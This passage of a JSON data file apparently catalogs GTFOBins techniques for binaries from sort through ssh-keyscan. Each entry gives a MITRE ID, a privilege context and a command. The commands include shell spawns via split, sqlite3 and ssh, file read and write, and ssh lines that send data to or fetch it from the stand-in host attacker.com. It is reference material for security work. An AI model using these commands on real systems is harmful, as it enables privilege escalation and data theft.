/path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-write:0:unprivileged","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-read:0:sudo","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-read:0:suid","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-read:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-write:0:sudo","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-write:0:suid","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-write:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:shell:0:sudo","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:shell:0:suid","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:shell:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-read:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-read:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-read:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-write:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-write:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-write:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:shell:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:shell:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:shell:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlmap:inherit:0:sudo","toolId":"gtfo:sqlmap","toolName":"sqlmap","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"sqlmap -u 127.0.0.1 --eval='...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlmap:inherit:0:unprivileged","toolId":"gtfo:sqlmap","toolName":"sqlmap","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"sqlmap -u 127.0.0.1 --eval='...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ss:file-read:0:sudo","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ss/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ss:file-read:0:suid","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ss/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ss:file-read:0:unprivileged","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ss/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:download:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:download:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:download:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:file-read:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:file-read:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:file-read:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:1:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:1:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:2:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh localhost","description":"Spawn the shell on the client, but still requires a successful remote connection.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:2:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh localhost","description":"Spawn the shell on the client, but still requires a successful remote connection.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:upload:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:upload:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:upload:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-agent:shell:0:sudo","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-agent:shell:0:suid","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-agent:shell:0:unprivileged","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-copy-id:file-read:0:sudo","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-copy-id -f -i /path/to/input-file.pub user@attacker.com","description":"The input file must have the `.pub` file extension. The file will be copied to `~/.ssh/authorized_keys`, otherwise the `-t /path/to/output-file` option can be used.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-copy-id:file-read:0:unprivileged","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ssh-copy-id -f -i /path/to/input-file.pub user@attacker.com","description":"The input file must have the `.pub` file extension. The file will be copied to `~/.ssh/authorized_keys`, otherwise the `-t /path/to/output-file` option can be used.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-copy-id:file-write:0:sudo","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ssh-copy-id -f -i /path/to/input-file.pub -t /path/to/output-file user@host","description":"The input file must have the `.pub` file extension.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-copy-id:file-write:0:unprivileged","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ssh-copy-id -f -i /path/to/input-file.pub -t /path/to/output-file user@host","description":"The input file must have the `.pub` file extension.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keygen:library-load:0:sudo","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` function.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keygen:library-load:0:suid","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` function.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keygen:library-load:0:unprivileged","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` function.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keyscan:file-read:0:sudo","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a 